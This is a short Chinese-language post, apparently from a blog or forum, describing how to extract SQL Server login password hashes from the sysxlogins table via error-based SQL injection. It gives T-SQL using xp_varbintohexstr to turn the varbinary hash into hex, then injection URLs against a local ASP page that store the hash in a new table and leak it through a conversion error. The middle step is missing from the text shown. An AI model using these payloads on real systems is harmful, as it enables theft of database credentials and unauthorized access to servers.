sysxlogins表中的password字段是varbinary,是沒有辦法通過報錯獲得的。最近偶爾看到一個叫xp_varbintohexstr的擴(kuò)展儲存,便有了思路:
核心演示代碼(查詢分析器)
declare @p varbinary(64),@u varchar(16),@s varchar(128);
select top 1 @u = name,@p = password from (select top 1 * from sysxlogins where password is NOT NULL order by name ASC)T order by name DESC;
exec xp_varbintohexstr @p,@s OUT;
select 'User:' + @u + '/Hash:' + @s;
理論的推導(dǎo)往往是可憎的,一下為本機(jī)asp+SA顯錯的測試結(jié)果:
Step.1
http://localhost/inject.asp?id=1;create+table+SQLhash(hash+varchar(2000))--
Step.2
Step.3
http://localhost/inject.asp?id=1+and+(select+top+1+hash+from+SQLhash)=0--